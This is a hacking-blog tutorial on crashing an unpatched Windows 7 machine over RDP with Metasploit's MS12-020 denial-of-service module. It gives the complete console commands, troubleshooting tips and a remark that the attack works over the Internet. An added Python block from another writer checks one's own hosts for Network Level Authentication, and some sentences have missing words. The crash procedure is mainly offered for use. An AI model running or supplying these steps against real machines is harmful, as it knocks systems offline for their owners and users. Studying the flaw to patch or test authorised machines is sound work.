
Penetration Testing Windows 7 Machine for Remote Desktop Vulnerability

Penetration Testing Windows 7 by Crashing the Machine using the Remote Desktop Connection Vulnerability.

This is a tutorial for penetration testing a Windows 7 machine for the Remote Desktop connection vulnerability using everyone’s favourite exploitation framework, Metasploit. Earlier there were exploits for unpatched XP machines, but for modern operating systems such as Windows 7 there aren't any such magical exploits. Penetration testing tutorials generally demonstrate on a Windows XP machine, but that OS is long gone, so Hackingloops brings you a penetration testing tutorial on a Windows 7 machine.

Generally we have seen client-side exploits and payloads all the time for Windows 7 , Toolkit is great for such attacks. However, a Windows 7 machine without the MS12-020 update still has a vulnerability in its RDP (Remote Desktop Protocol) service on port 3389, which is accessible over the LAN and the Internet. Over the Internet this is a little complicated due to the need of , over the LAN this attack is a piece of cake.

All you need for this is a Kali machine and a victim Windows 7 machine.

Penetration testing Windows 7 with Kali Linux

Let's begin the tutorial with a scenario where the victim Windows 7 machine is on the LAN. All we need to get started is the Windows 7 machine's IP address, which you can easily get with either Nmap or the ipconfig command (in case you are practicing and have access to the Windows 7 machine).

Start Metasploit : msfconsole

Next we need to select the exploit that we are planning to use, i.e. ms12_020_maxchannelids

Command : use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

Now if you don't know what options this exploit needs, type the command "show options" in msfconsole. This will list all the options that need to be set for this exploit.

Set the remote host IP address :

Command : set RHOST <Vict-windows 7 IP>

And you are done!

Just type "exploit".

If all went right, the target machine will show a blue screen, crash and then reboot. This can be done over the Internet too.

If you get an error of this sort, then most probably your Windows 7 machine has its firewall enabled and is blocking your packets. An antivirus could do the same thing. There might also be an issue with the LAN connection, so that the attacker Kali machine and the victim Windows 7 machine are not communicating at all; a good diagnostic test is to ping the machine. Also make sure that Remote Desktop is enabled on the Windows 7 machine.

To enable Remote Desktop : Go to System (Control Panel\System and Security\System). Click on Remote settings. Select the "Allow Remote Connections to this computer" button and click OK.
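From the defender's side, the same reachability and Remote settings questions can be checked without crashing anything. The following is an added example, not code from the original post: it sends only the first RDP negotiation message, offering standard RDP security, and reports whether a machine you administer is reachable on port 3389 and whether it insists on Network Level Authentication (the "more secure" choice in the Remote settings dialog). The function names and the sample replies are constructed for illustration; the constants come from the RDP negotiation structures in MS-RDPBCGR.

```python
import socket
import struct

# Constants from the RDP negotiation structures (MS-RDPBCGR).
NEG_RSP, NEG_FAILURE = 0x02, 0x03
SSL_REQUIRED, HYBRID_REQUIRED = 0x01, 0x05

def build_request(protocols=0):
    """TPKT + X.224 Connection Request offering only the given protocols
    (0 = standard RDP security, i.e. no TLS and no NLA)."""
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, protocols)
    x224 = struct.pack(">BBHHB", 6 + len(neg_req), 0xE0, 0, 0, 0) + neg_req
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224

def classify_response(data):
    """Interpret the server's X.224 Connection Confirm to build_request(0)."""
    if len(data) < 11 or data[0] != 3 or (data[5] & 0xF0) != 0xD0:
        return "not-rdp"
    if len(data) < 19:                      # confirm without a negotiation block
        return "nla-not-enforced"
    neg_type, _flags, _len, value = struct.unpack("<BBHI", data[11:19])
    if neg_type == NEG_FAILURE and value == HYBRID_REQUIRED:
        return "nla-enforced"               # server refuses sessions without NLA
    if neg_type == NEG_FAILURE and value == SSL_REQUIRED:
        return "tls-required"
    if neg_type == NEG_RSP and value == 0:
        return "nla-not-enforced"           # server accepted standard RDP security
    return "unexpected"

def probe(host, port=3389, timeout=3.0):
    """Audit one host you administer; 'unreachable' covers firewall drops."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_request())
            return classify_response(s.recv(1024))
    except OSError:
        return "unreachable"

# Constructed sample replies (not captured from a real host).
SAMPLES = {
    "nla required": bytes.fromhex("03000013" "0ed00000123400" "0300080005000000"),
    "plain rdp ok": bytes.fromhex("03000013" "0ed00000123400" "0200080000000000"),
    "no neg block": bytes.fromhex("0300000b" "06d00000123400"),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:14} -> {classify_response(raw)}")
```

A result of "nla-not-enforced" means the host will start an RDP session for a client that has not authenticated, so it should be patched and moved to the NLA-only setting or kept behind the firewall.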

About Vanshit Malhotra

Ethical Hacker | Cyber Forensics Investigator | Information Security Consultant. Expert at security tactics orchestrating operations to fit strategy. With 3+ years of experience in various domains of Information Security, I have been able to solve very complex security problems across many technologies and then teach and enable the clients to do the same.